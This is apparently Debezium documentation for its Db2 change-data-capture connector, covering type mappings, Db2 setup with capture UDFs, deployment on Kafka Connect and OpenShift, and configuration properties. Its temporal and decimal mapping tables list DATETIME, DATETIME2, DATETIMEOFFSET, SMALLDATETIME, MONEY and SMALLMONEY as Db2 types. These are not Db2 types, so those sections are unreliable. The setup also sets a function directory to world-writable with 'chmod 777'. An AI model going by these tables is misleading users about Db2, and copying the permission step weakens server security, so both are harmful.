Other than Db2's `DATETIMEOFFSET` data type, which contains time zone information, how temporal types are mapped depends on the value of the `time.precision.mode` connector configuration property. The following sections describe these mappings:

* xref:db2-time-precision-mode-adaptive[`time.precision.mode=adaptive`]
* xref:db2-time-precision-mode-connect[`time.precision.mode=connect`]

[[db2-time-precision-mode-adaptive]]
.`time.precision.mode=adaptive`
When the `time.precision.mode` configuration property is set to `adaptive`, the default, the connector determines the literal type and semantic type based on the column's data type definition. 
This ensures that events _exactly_ represent the values in the database.

.Mappings when `time.precision.mode` is `adaptive`
[cols="25%a,20%a,55%a",options="header"]
|===
|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes

|`DATE`
|`INT32`
|`io.debezium.time.Date` +
 +
Represents the number of days since the epoch.

|`TIME(0)`, `TIME(1)`, `TIME(2)`, `TIME(3)`
|`INT32`
|`io.debezium.time.Time` +
 +
Represents the number of milliseconds past midnight, and does not include timezone information.

|`TIME(4)`, `TIME(5)`, `TIME(6)`
|`INT64`
|`io.debezium.time.MicroTime` +
 +
Represents the number of microseconds past midnight, and does not include timezone information.

|`TIME(7)`
|`INT64`
|`io.debezium.time.NanoTime` +
 +
Represents the number of nanoseconds past midnight, and does not include timezone information.

|`DATETIME`
|`INT64`
|`io.debezium.time.Timestamp` +
 +
Represents the number of milliseconds since the epoch, and does not include timezone information.

|`SMALLDATETIME`
|`INT64`
|`io.debezium.time.Timestamp` +
 +
Represents the number of milliseconds since the epoch, and does not include timezone information.

|`DATETIME2(0)`, `DATETIME2(1)`, `DATETIME2(2)`, `DATETIME2(3)`
|`INT64`
|`io.debezium.time.Timestamp` +
 +
Represents the number of milliseconds since the epoch, and does not include timezone information.

|`DATETIME2(4)`, `DATETIME2(5)`, `DATETIME2(6)`
|`INT64`
|`io.debezium.time.MicroTimestamp` +
 +
Represents the number of microseconds since the epoch, and does not include timezone information.

|`DATETIME2(7)`
|`INT64`
|`io.debezium.time.NanoTimestamp` +
 +
Represents the number of nanoseconds past the epoch, and does not include timezone information.
|===

[[db2-time-precision-mode-connect]]
.`time.precision.mode=connect`
When the `time.precision.mode` configuration property is set to `connect`, the connector uses Kafka Connect logical types. This may be useful when consumers can handle only the built-in Kafka Connect logical types and are unable to handle variable-precision time values. However, since Db2 supports a tenth of a microsecond precision, the events generated by a connector with the `connect` time precision mode *result in a loss of precision* when the database column has a _fractional second precision_ value that is greater than 3.

.Mappings when `time.precision.mode` is `connect`
[cols="25%a,20%a,55%a",options="header"]
|===
|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes

|`DATE`
|`INT32`
|`org.apache.kafka.connect.data.Date` +
 +
Represents the number of days since the epoch.

|`TIME([P])`
|`INT64`
|`org.apache.kafka.connect.data.Time` +
 +
Represents the number of milliseconds since midnight, and does not include timezone information. 
Db2 allows `P` to be in the range 0-7 to store up to a tenth of a microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.

|`DATETIME`
|`INT64`
|`org.apache.kafka.connect.data.Timestamp` +
 +
Represents the number of milliseconds since the epoch, and does not include timezone information.

|`SMALLDATETIME`
|`INT64`
|`org.apache.kafka.connect.data.Timestamp` +
 +
Represents the number of milliseconds since the epoch, and does not include timezone information.

|`DATETIME2`
|`INT64`
|`org.apache.kafka.connect.data.Timestamp` +
 +
Represents the number of milliseconds since the epoch, and does not include timezone information. Db2 allows `P` to be in the range 0-7 to store up to a tenth of a microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.
|===

[[db2-timestamp-types]]
=== Timestamp types

The `DATETIME`, `SMALLDATETIME`, and `DATETIME2` types represent a timestamp without time zone information.
Such columns are converted into an equivalent Kafka Connect value based on UTC. For example, the `DATETIME2` value "2018-06-20 15:13:16.945104" is represented by an `io.debezium.time.MicroTimestamp` with the value "1529507596945104".

The timezone of the JVM running Kafka Connect and {prodname} does not affect this conversion.

[[db2-decimal-types]]
=== Decimal types

[cols="27%a,18%a,55%a",options="header"]
|===
|Db2 data type |Literal type (schema type) |Semantic type (schema name) and Notes

|`NUMERIC[(P[,S])]`
|`BYTES`
|`org.apache.kafka.connect.data.Decimal` +
 +
The `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.
The `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.

|`DECIMAL[(P[,S])]`
|`BYTES`
|`org.apache.kafka.connect.data.Decimal` +
 +
The `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.
The `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.

|`SMALLMONEY`
|`BYTES`
|`org.apache.kafka.connect.data.Decimal` +
 +
The `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.
The `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.

|`MONEY`
|`BYTES`
|`org.apache.kafka.connect.data.Decimal` +
 +
The `scale` schema parameter contains an integer that represents how many digits the decimal point is shifted.
The `connect.decimal.precision` schema parameter contains an integer that represents the precision of the given decimal value.
|===
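For example, a `DECIMAL(8,2)` column value such as `12345.67` is transmitted as the unscaled integer `1234567` encoded in a `BYTES` field, with the scale carried in the schema parameters. The following is a sketch of how the corresponding field schema might look in JSON form; it is an illustration with a hypothetical `PRICE` column, not output captured from a connector:

[source,json]
----
{
  "type": "bytes",
  "optional": false,
  "name": "org.apache.kafka.connect.data.Decimal",
  "parameters": {
    "scale": "2",
    "connect.decimal.precision": "8"
  },
  "field": "PRICE"
}
----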
// Type: procedure
// ModuleID: setting-up-db2-to-run-a-debezium-connector
// Title: Setting up Db2 to run a {prodname} connector
[[setting-up-db2]]
== Set up

A database administrator must put tables into capture mode before you can run a {prodname} Db2 connector to capture changes that are committed to a Db2 database. To put tables into capture mode, {prodname} provides a set of user-defined functions (UDFs) for your convenience. The procedure here shows how to install and run these management UDFs. Alternatively, you can run Db2 control commands to put tables into capture mode.

This procedure assumes that you are logged in as the `db2inst1` user, which is the default instance and user name when using the Db2 docker container image.

.Prerequisites

* On the machine on which Db2 is running, the content in `debezium-connector-db2/src/test/docker/db2-cdc-docker` is available in the `$HOME/asncdctools/src` directory.

.Procedure

. Compile the {prodname} management UDFs on the Db2 server host by using the `bldrtn`
command provided with Db2:
+
[source,shell]
----
cd $HOME/asncdctools/src
----
+
[source,shell]
----
./bldrtn asncdc
----

. Start the database if it is not already running. Replace `DB_NAME` with the name of the database that you want {prodname} to connect to.
+
[source,shell]
----
db2 start db DB_NAME
----

. Ensure that JDBC can read the Db2 metadata catalog:
+
[source,shell]
----
cd $HOME/sqllib/bnd
----
+
[source,shell]
----
db2 bind db2schema.bnd blocking all grant public sqlerror continue
----

. Ensure that the database was recently backed up. The ASN agents must have a recent starting point to read from. If you need to perform a backup, run the following commands, which prune the data so that only the most recent version is available. If you do not need to retain the older versions of the data, specify `/dev/null` for the backup location.

.. Back up the database. Replace `DB_NAME` and `BACK_UP_LOCATION` with appropriate values:
+
[source,shell]
----
db2 backup db DB_NAME to BACK_UP_LOCATION
----

.. Restart the database:
+
[source,shell]
----
db2 restart db DB_NAME
----

. Connect to the database to install the {prodname} management UDFs. This step assumes that you are logged in as the `db2inst1` user, so the UDFs are installed under the `db2inst1` user:
+
[source,shell]
----
db2 connect to DB_NAME
----

. Copy the {prodname} management UDFs and set permissions for them:
+
[source,shell]
----
cp $HOME/asncdctools/src/asncdc $HOME/sqllib/function
----
+
[source,shell]
----
chmod 777 $HOME/sqllib/function
----

. Enable the {prodname} UDF that starts and stops the ASN capture agent:
+
[source,shell]
----
db2 -tvmf $HOME/asncdctools/src/asncdc_UDF.sql
----

. Create the ASN control tables:
+
[source,shell]
----
db2 -tvmf $HOME/asncdctools/src/asncdctables.sql
----

. Enable the {prodname} UDF that adds tables to capture mode and removes tables from capture mode:
+
[source,shell]
----
db2 -tvmf $HOME/asncdctools/src/asncdcaddremove.sql
----
+
After you set up the Db2 server, use the UDFs to control Db2 replication (ASN) with SQL commands. Some of the UDFs expect a return value, in which case you use the SQL `VALUES` statement to invoke them. For other UDFs, use the SQL `CALL` statement.

. Start the ASN agent:
+
[source,sql]
----
VALUES ASNCDC.ASNCDCSERVICES('start','asncdc');
----

. Put tables into capture mode. Invoke the following statement for each table that you want to put into capture mode. Replace `MYSCHEMA` with the name of the schema that contains the table that you want to put into capture mode. Likewise, replace `MYTABLE` with the name of the table to put into capture mode:
+
[source,sql]
----
CALL ASNCDC.ADDTABLE('MYSCHEMA', 'MYTABLE');
----
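+
To check which tables are in capture mode, you can query the ASN register table. This is a minimal sketch that assumes the default `ASNCDC` replication schema and the standard register-table columns; verify both in your environment:
+
[source,sql]
----
-- Lists the registered source tables; a STATE of 'A' means active.
SELECT SOURCE_OWNER, SOURCE_TABLE, STATE
FROM ASNCDC.IBMSNAP_REGISTER;
----

. 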
Reinitialize the ASN service:\n+\n[source,sql]\n----\nVALUES ASNCDC.ASNCDCSERVICES('reinit','asncdc');\n----\n\n.Additional resource\n\n{link-prefix}:{link-db2-connector}#managing-debezium-db2-connectors[Reference table for {prodname} Db2 management UDFs]\n\n\/\/ Type: assembly\n\/\/ ModuleID: deploying-debezium-db2-connectors\n\/\/ Title: Deploying {prodname} Db2 connectors\n[[db2-deploying-a-connector]]\n== Deployment\n\nifdef::community[]\n\nWith https:\/\/zookeeper.apache.org[Zookeeper], http:\/\/kafka.apache.org\/[Kafka], and {link-kafka-docs}.html#connect[Kafka Connect] installed, the remaining tasks to deploy a {prodname} Db2 connector are:\n\n. Download the link:https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-db2\/{debezium-version}\/debezium-connector-db2-{debezium-version}-plugin.tar.gz[connector's plug-in archive].\n\n. Extract the JAR files into your Kafka Connect environment.\n. Add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`].\n. Obtain the link:https:\/\/www.ibm.com\/support\/pages\/db2-jdbc-driver-versions-and-downloads[JDBC driver for Db2].\n. Add the JDBC driver JAR file to the directory with the {prodname} Db2 connector JARs.\n. {link-prefix}:{link-db2-connector}#db2-adding-connector-configuration[Configure the connector and add the configuration to your Kafka Connect cluster.]\n. Restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s Container images] for Zookeeper, Kafka and Kafka Connect with the Db2 connector already installed and ready to run.\nYou can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\nendif::community[]\n\nifdef::product[]\nTo deploy a {prodname} Db2 connector, install the {prodname} Db2 connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect. Details are in the following topics:\n\n* xref:steps-for-installing-debezium-db2-connectors[]\n* xref:debezium-db2-connector-configuration-example[]\n* xref:adding-debezium-db2-connector-configuration-to-kafka-connect[]\n* xref:descriptions-of-debezium-db2-connector-configuration-properties[]\n\n\/\/ Type: concept\n[id=\"steps-for-installing-debezium-db2-connectors\"]\n=== Steps for installing {prodname} Db2 connectors\n\nTo install the Db2 connector, follow the procedures in {LinkDebeziumInstallOpenShift}[{NameDebeziumInstallOpenShift}]. The main steps are:\n\n. {LinkDebeziumUserGuide}#setting-up-db2-to-run-a-debezium-connector[Set up Db2 to run a {prodname} connector]. This enables Db2 replication to expose change-data for tables that are in capture mode.\n\n. Use link:https:\/\/access.redhat.com\/products\/red-hat-amq#streams[Red Hat AMQ Streams] to set up Apache Kafka and Kafka Connect on OpenShift. AMQ Streams offers operators and images that bring Kafka to OpenShift.\n\n. Download the {prodname} link:https:\/\/access.redhat.com\/jbossnetwork\/restricted\/listSoftware.html?product=red.hat.integration&downloadType=distributions[Db2 connector].\n\n. Extract the files into your Kafka Connect environment.\n. Add the plug-in's parent directory to your Kafka Connect `plugin.path`, for example:\n+\n[source]\n----\nplugin.path=\/kafka\/connect\n----\n+\nThe above example assumes that you extracted the {prodname} Db2 connector to the `\/kafka\/connect\/{prodname}-connector-db2` path.\n\n. 
Restart your Kafka Connect process to ensure that the new JAR files are picked up.\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-db2-connector-configuration-example\n\/\/ Title: {prodname} Db2 connector configuration example\n[[db2-example-configuration]]\n=== Connector configuration example\n\nifdef::community[]\n\n[[db2-example]]\n\nFollowing is an example of the configuration for a Db2 connector that connects to a Db2 server on port 50000 at 192.168.99.100, whose logical name is `fullfillment`. Typically, you configure the {prodname} Db2 connector in a `.json` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,json]\n----\n{\n \"name\": \"db2-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.db2.Db2Connector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"50000\", \/\/ <4>\n \"database.user\": \"db2inst1\", \/\/ <5>\n \"database.password\": \"Password!\", \/\/ <6>\n \"database.dbname\": \"mydatabase\", \/\/ <7>\n \"database.server.name\": \"fullfillment\", \/\/ <8>\n \"table.include.list\": \"MYSCHEMA.CUSTOMERS\", \/\/ <9>\n \"database.history.kafka.bootstrap.servers\": \"kafka:9092\", \/\/ <10>\n \"database.history.kafka.topic\": \"dbhistory.fullfillment\" \/\/ <11>\n }\n}\n----\n<1> The name of the connector when registered with a Kafka Connect service.\n<2> The name of this Db2 connector class.\n<3> The address of the Db2 instance.\n<4> The port number of the Db2 instance.\n<5> The name of the Db2 user.\n<6> The password for the Db2 user.\n<7> The name of the database to capture changes from.\n<8> The logical name of the Db2 instance\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the {link-prefix}:{link-avro-serialization}[Avro Connector] is used.\n<9> A list of all tables whose changes {prodname} should capture.\n<10> The list of Kafka brokers that this connector uses to write and recover DDL statements to the database history topic.\n<11> The name of the database history topic where the connector writes and recovers DDL statements. This topic is for internal use only and should not be used by consumers.\n\nendif::community[]\n\nifdef::product[]\n\nFollowing is an example of the configuration for a Db2 connector that connects to a Db2 server on port 50000 at 192.168.99.100, whose logical name is `fullfillment`. Typically, you configure a {prodname} Db2 connector in a `.yaml` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. 
Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,yaml,options=\"nowrap\",subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnector\nmetadata:\n  name: inventory-connector \/\/ <1>\n  labels:\n    strimzi.io\/cluster: my-connect-cluster\nspec:\n  class: io.debezium.connector.db2.Db2Connector\n  tasksMax: 1 \/\/ <2>\n  config: \/\/ <3>\n    database.hostname: 192.168.99.100 \/\/ <4>\n    database.port: 50000\n    database.user: db2inst1\n    database.password: Password!\n    database.dbname: mydatabase\n    database.server.name: fullfillment \/\/ <5>\n    database.include.list: public.inventory \/\/ <6>\n----\n\n.Descriptions of connector configuration settings\n[cols=\"1,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Item |Description\n\n|1\n|The name of the connector.\n\n|2\n|Only one task should operate at any one time.\n\n|3\n|The connector\u2019s configuration.\n\n|4\n|The database host, which is the address of the Db2 instance.\n\n|5\n|The logical name of the Db2 instance\/cluster, which forms a namespace and is used in the names of the Kafka topics to which the connector writes, the names of Kafka Connect schemas, and the namespaces of the corresponding Avro schema when the {link-prefix}:{link-avro-serialization}[Avro Connector] is used.\n\n|6\n|Changes in only the `public.inventory` database are captured.\n\n|===\n\nendif::product[]\n\nSee the {link-prefix}:{link-db2-connector}#db2-connector-properties[complete list of connector properties] that you can specify in these configurations.\n\nYou can send this configuration with a `POST` command to a running Kafka Connect service. The service records the configuration and starts one connector task that connects to the Db2 database, reads change-data tables for tables in capture mode, and streams change event records to Kafka topics.\n\n\/\/ Type: procedure\n\/\/ ModuleID: adding-debezium-db2-connector-configuration-to-kafka-connect\n\/\/ Title: Adding {prodname} Db2 connector configuration to Kafka Connect\n[[db2-adding-connector-configuration]]\n=== Adding connector configuration\n\nifdef::community[]\nTo start running a Db2 connector, create a connector configuration and add the configuration to your Kafka Connect cluster.\n\n.Prerequisites\n\n* {link-prefix}:{link-db2-connector}#setting-up-db2-to-run-a-debezium-connector[Db2 replication] is enabled to expose change-data for tables that are in capture mode.\n\n* The Db2 connector is installed.\n\n.Procedure\n\n. Create a configuration for the Db2 connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\n\nendif::community[]\n\nifdef::product[]\nYou can use a provided {prodname} container to deploy a {prodname} Db2 connector. In this procedure, you build a custom Kafka Connect container image for {prodname}, configure the {prodname} connector as needed, and then add your connector configuration to your Kafka Connect environment.\n\n.Prerequisites\n\n* Podman or Docker is installed and you have sufficient rights to create and manage containers.\n* You installed the {prodname} Db2 connector archive.\n\n.Procedure\n\n. Extract the {prodname} Db2 connector archive to create a directory structure for the connector plug-in, for example:\n+\n[subs=+macros]\n----\npass:quotes[*tree .\/my-plugins\/*]\n.\/my-plugins\/\n\u251c\u2500\u2500 debezium-connector-db2\n\u2502 \u251c\u2500\u2500 ...\n----\n\n. 
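Ensure that the Db2 JDBC driver JAR file is present in the same directory as the connector JAR files; the connector requires the driver at runtime. If your archive does not already include it, copy it into the connector directory. The driver file name below is illustrative and depends on the driver version you obtained:\n+\n[source,shell]\n----\ncp jcc-<version>.jar .\/my-plugins\/debezium-connector-db2\/\n----\n\n. 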
Create and publish a custom image for running your {prodname} connector:\n\n.. Create a new `Dockerfile` by using `{DockerKafkaConnect}` as the base image. In the following example, you would replace _my-plugins_ with the name of your plug-ins directory:\n+\n[subs=\"+macros,+attributes\"]\n----\nFROM {DockerKafkaConnect}\nUSER root:root\npass:quotes[COPY _.\/my-plugins\/_ \/opt\/kafka\/plugins\/]\nUSER 1001\n----\n+\nBefore Kafka Connect starts running the connector, Kafka Connect loads any third-party plug-ins that are in the `\/opt\/kafka\/plugins` directory.\n\n.. Build the container image. For example, to build from the `Dockerfile` that you created in the previous step and tag the image as `debezium-container-for-db2`, run the following command from the directory that contains the `Dockerfile`:\n+\n`podman build -t debezium-container-for-db2:latest .`\n\n.. Push your custom image to your container registry, for example:\n+\n`podman push debezium-container-for-db2:latest`\n\n.. Point to the new container image. Do one of the following:\n+\n* Edit the `spec.image` property of the `KafkaConnect` custom resource. If set, this property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator. For example:\n+\n[source,yaml,subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnect\nmetadata:\n  name: my-connect-cluster\nspec:\n  #...\n  image: debezium-container-for-db2\n----\n+\n* In the `install\/cluster-operator\/050-Deployment-strimzi-cluster-operator.yaml` file, edit the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable to point to the new container image and reinstall the Cluster Operator. If you edit this file, you must apply it to your OpenShift cluster.\n\n. Create a `KafkaConnector` custom resource that defines your {prodname} Db2 connector instance. See {LinkDebeziumUserGuide}#debezium-db2-connector-configuration-example[the connector configuration example].\n\n. Apply the connector instance, for example:\n+\n`oc apply -f inventory-connector.yaml`\n+\nThis registers `inventory-connector` and the connector starts to run against the `inventory` database.\n\n. Verify that the connector was created and has started to capture changes in the specified database. You can verify the connector instance by watching the Kafka Connect log output as, for example, `inventory-connector` starts.\n\n.. Display the Kafka Connect log output:\n+\n[source,shell,options=\"nowrap\"]\n----\noc logs $(oc get pods -o name -l strimzi.io\/name=my-connect-cluster-connect)\n----\n\n.. Review the log output to verify that the initial snapshot has been executed. You should see something like the following lines:\n+\n[source,shell,options=\"nowrap\"]\n----\n... INFO Starting snapshot for ...\n... INFO Snapshot is using user 'debezium' ...\n----\n\nendif::product[]\n\n.Results\n\nWhen the connector starts, it {link-prefix}:{link-db2-connector}#db2-snapshots[performs a consistent snapshot] of the Db2 database tables that the connector is configured to capture changes for. 
The connector then starts generating data change events for row-level operations and streaming change event records to Kafka topics.\n\n\/\/ Type: reference\n\/\/ ModuleID: descriptions-of-debezium-db2-connector-configuration-properties\n\/\/ Title: Description of {prodname} Db2 connector configuration properties\n[[db2-connector-properties]]\n=== Connector properties\n\nThe {prodname} Db2 connector has numerous configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:\n\n* xref:db2-required-configuration-properties[Required configuration properties]\n* xref:db2-advanced-configuration-properties[Advanced configuration properties]\n* xref:db2-pass-through-properties[Pass-through configuration properties]\n\n[id=\"db2-required-configuration-properties\"]\nThe following configuration properties are _required_ unless a default value is available.\n\n.Required connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property |Default |Description\n\n|[[db2-property-name]]<<db2-property-name, `+name+`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. This property is required by all Kafka Connect connectors.\n\n|[[db2-property-connector-class]]<<db2-property-connector-class, `+connector.class+`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.db2.Db2Connector` for the Db2 connector.\n\n|[[db2-property-tasks-max]]<<db2-property-tasks-max, `+tasks.max+`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The Db2 connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|[[db2-property-database-hostname]]<<db2-property-database-hostname, `+database.hostname+`>>\n|\n|IP address or hostname of the Db2 database server.\n\n|[[db2-property-database-port]]<<db2-property-database-port, `+database.port+`>>\n|`50000`\n|Integer port number of the Db2 database server.\n\n|[[db2-property-database-user]]<<db2-property-database-user, `+database.user+`>>\n|\n|Name of the Db2 database user for connecting to the Db2 database server.\n\n|[[db2-property-database-password]]<<db2-property-database-password, `+database.password+`>>\n|\n|Password to use when connecting to the Db2 database server.\n\n|[[db2-property-database-dbname]]<<db2-property-database-dbname, `+database.dbname+`>>\n|\n|The name of the Db2 database from which to stream the changes\n\n|[[db2-property-database-server-name]]<<db2-property-database-server-name, `+database.server.name+`>>\n|\n|Logical name that identifies and provides a namespace for the particular Db2 database server that hosts the database for which {prodname} is capturing changes. Only alphanumeric characters and underscores should be used in the database server logical name. 
The logical name should be unique across all other connectors, since it is used as a topic name prefix for all Kafka topics that receive records from this connector.\n\n|[[db2-property-database-history-kafka-topic]]<<db2-property-database-history-kafka-topic, `+database.history.kafka.topic+`>>\n|\n|The full name of the Kafka topic where the connector stores the database schema history.\n\n|[[db2-property-database-history-kafka-bootstrap-servers]]<<db2-property-database-history-kafka-bootstrap-servers, `+database.history.kafka.bootstrap.servers+`>>\n|\n|A list of host\/port pairs that the connector uses to establish an initial connection to the Kafka cluster. This connection is used for retrieving database schema history previously stored by the connector, and for writing each DDL statement read from the source database. Each pair should point to the same Kafka cluster used by the {prodname} Kafka Connect process.\n\n|[[db2-property-table-include-list]]<<db2-property-table-include-list, `+table.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you want the connector to capture. Any table not included in the include list does not have its changes captured. Each identifier is of the form _schemaName_._tableName_. By default, the connector captures changes in every non-system table. Do not also set the `table.exclude.list` property.\n\n|[[db2-property-table-exclude-list]]<<db2-property-table-exclude-list, `+table.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you do not want the connector to capture. The connector captures changes in each non-system table that is not included in the exclude list. Each identifier is of the form _schemaName_._tableName_. Do not also set the `table.include.list` property.\n\n|[[db2-property-column-exclude-list]]<<db2-property-column-exclude-list, `+column.exclude.list+`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns to exclude from change event values.\nFully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.\nPrimary key columns are always included in the event's key, even if they are excluded from the value.\n\n|[[db2-property-column-mask-hash]]<<db2-property-column-mask-hash, `+column.mask.hash._hashAlgorithm_.with.salt._salt_+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be pseudonyms in change event values. A pseudonym is a field value that consists of the hashed value obtained by applying the `_hashAlgorithm_` algorithm and the `_salt_` salt that you specify in the property name. +\n +\nBased on the hash algorithm applied, referential integrity is kept while data is masked. Supported hash algorithms are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation.\nThe hash value is automatically shortened to the length of the column. +\n +\nYou can specify multiple instances of this property with different algorithms and salts. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. 
For example: +\n +\n`column.mask.hash.SHA-256.with.salt.CzQMA0cB5K =` + `inventory.orders.customerName, inventory.shipment.customerName` +\n +\nwhere `CzQMA0cB5K` is a randomly selected salt.\n +\nDepending on the `_hashAlgorithm_` used, the `_salt_` selected, and the actual data set, the field value may not be completely masked.\n\n|[[db2-property-time-precision-mode]]<<db2-property-time-precision-mode, `+time.precision.mode+`>>\n|`adaptive`\n| Time, date, and timestamps can be represented with different kinds of precision: +\n +\n`adaptive` captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. +\n +\n`connect` always represents time and timestamp values by using Kafka Connect's built-in representations for `Time`, `Date`, and `Timestamp`, which use millisecond precision regardless of the database columns' precision. See {link-prefix}:{link-db2-connector}#db2-temporal-values[temporal values].\n\n|[[db2-property-tombstones-on-delete]]<<db2-property-tombstones-on-delete, `+tombstones.on.delete+`>>\n|`true`\n| Controls whether a tombstone event should be generated after a _delete_ event. +\n +\n`true` - delete operations are represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is sent. +\n +\nAfter a _delete_ operation, emitting a tombstone event enables Kafka to delete all change event records that have the same key as the deleted row.\n\n|[[db2-property-include-schema-changes]]<<db2-property-include-schema-changes, `+include.schema.changes+`>>\n|`true`\n|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change is recorded with a key that contains the database name and a value that is a JSON structure that describes the schema update. This is independent of how the connector internally records database history.\n\n|[[db2-property-column-truncate-to-length-chars]]<<db2-property-column-truncate-to-length-chars, `+column.truncate.to._length_.chars+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event records, values in these columns are truncated if they are longer than the number of characters specified by _length_ in the property name. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer, for example, `column.truncate.to.20.chars`.\n\n|[[db2-property-column-mask-with-length-chars]]<<db2-property-column-mask-with-length-chars, `+column.mask.with._length_.chars+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event values, the values in the specified table columns are replaced with _length_ number of asterisk (`*`) characters. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer or zero. 
When you specify zero, the connector replaces a value with an empty string.\n\n|[[db2-property-column-propagate-source-type]]<<db2-property-column-propagate-source-type, `+column.propagate.source.type+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_. +\n +\nFor each specified column, the connector adds the column's original type and original length as parameters to the corresponding field schemas in the emitted change records. The following added schema parameters propagate the original type name and also the original length for variable-width types: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThis property is useful for properly sizing corresponding columns in sink databases.\n\n|[[db2-property-datatype-propagate-source-type]]<<db2-property-datatype-propagate-source-type, `+datatype.propagate.source.type+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the database-specific data type name for some columns. Fully-qualified data type names are of the form _databaseName_._tableName_._typeName_, or _databaseName_._schemaName_._tableName_._typeName_. +\n +\nFor these data types, the connector adds parameters to the corresponding field schemas in emitted change records. The added parameters specify the original type and length of the column: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThese parameters propagate a column's original type name and length, for variable-width types, respectively. This property is useful for properly sizing corresponding columns in sink databases. +\n +\nSee {link-prefix}:{link-db2-connector}#db2-data-types[Db2 data types] for the list of Db2-specific data type names.\n\n|[[db2-property-message-key-columns]]<<db2-property-message-key-columns, `+message.key.columns+`>>\n|_empty string_\n|A semicolon separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +\n +\nSeparate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format is: +\n +\n_schema-name_._table-name_:_regexp_;... 
+\n +\nFor example, +\n +\n`schemaA.table_a:regex_1;schemaB.table_b:regex_2;schemaC.table_c:regex_3` +\n +\nIf `table_a` has an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in ``table_a``'s `id` column to a key field in change events that the connector sends to Kafka.\n\n|===\n\n[id=\"db2-advanced-configuration-properties\"]\nThe following _advanced_ configuration properties have defaults that work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n.Advanced connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property |Default |Description\n\n|[[db2-property-snapshot-mode]]<<db2-property-snapshot-mode, `+snapshot.mode+`>>\n|`initial`\n|Specifies the criteria for performing a snapshot when the connector starts: +\n +\n`initial` - For tables in capture mode, the connector takes a snapshot of the schema for the table and the data in the table. This is useful for populating Kafka topics with a complete representation of the data. +\n +\n`schema_only` - For tables in capture mode, the connector takes a snapshot of only the schema for the table. This is useful when only the changes that are happening from now on need to be emitted to Kafka 